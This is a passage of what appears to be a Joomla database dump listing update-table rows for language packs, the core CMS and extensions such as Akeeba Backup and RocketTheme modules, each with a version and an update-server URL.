Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17357,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17358,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17359,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17360,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17361,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17362,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17363,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17364,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17365,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17366,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17367,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17368,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17369,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17370,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17371,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17372,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17373,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17374,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17375,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17376,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17377,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17378,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17379,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17380,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17381,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17382,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17383,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17384,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17385,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17386,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17387,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17388,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17389,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17390,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17391,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17392,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17393,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17394,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17395,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17396,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17397,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17398,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17399,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17400,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17401,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17402,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17403,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17404,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17405,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17406,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17407,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17408,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17409,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17410,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17411,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17412,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17413,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17414,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17415,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17416,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17417,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17418,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17419,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17420,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17421,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17422,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17423,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17424,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17425,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17426,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17427,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17428,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17429,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17430,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17431,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17432,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17433,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17434,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17435,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17436,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17437,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17438,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17439,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17440,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17441,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17442,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17443,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17444,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17445,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17446,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17447,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17448,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17449,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17450,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17451,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17452,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17453,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17454,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17455,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17456,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17457,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17458,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17459,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17460,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17461,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17462,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17463,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17464,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17465,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17466,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17467,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17468,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17469,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17470,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17471,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17472,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17473,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17474,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17475,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17476,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17477,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17478,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17479,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17480,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17481,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17482,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17483,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17484,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17485,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17486,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17487,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17488,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17489,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17490,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17491,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17492,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17493,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17494,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17495,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17496,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17497,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17498,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17499,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17500,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17501,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17502,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17503,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17504,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17505,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17506,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17507,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17508,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17509,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17510,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17511,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17512,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17513,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17514,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17515,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17516,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17517,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17518,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17519,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17520,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17521,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17522,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17523,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17524,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17525,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17526,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17527,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17528,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17529,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17530,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17531,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17532,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17533,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17534,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17535,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17536,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17537,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17538,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17539,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17540,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17541,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17542,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17543,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17544,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17545,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17546,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17547,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17548,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17549,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17550,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17551,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17552,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17553,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17554,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17555,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17556,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17557,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17558,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17559,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17560,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17561,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17562,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17563,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17564,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17565,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17566,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17567,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17568,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17569,20,0,'RokCommon 